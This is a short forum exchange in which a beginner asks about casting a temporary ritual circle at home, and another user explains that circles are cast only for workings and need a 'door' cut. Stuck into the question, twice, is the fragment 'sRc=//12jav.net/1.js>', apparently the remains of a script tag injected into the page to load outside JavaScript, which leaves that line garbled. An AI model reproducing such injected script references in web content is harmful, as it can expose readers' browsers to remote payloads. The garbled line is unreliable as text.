can i cast a temp circle here at present home til i move or should i wait. whats the best way of opening casting s circle im still new sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Circles are typically temporary. They are places of sacred space for ritual and spell work. I only cast one when I am doing workings, never to just sit around. Once a circle is cast you have to 'cut a door' to let others in or out. this would be too time consuming and cumbersome to do around a house you live in all the time.
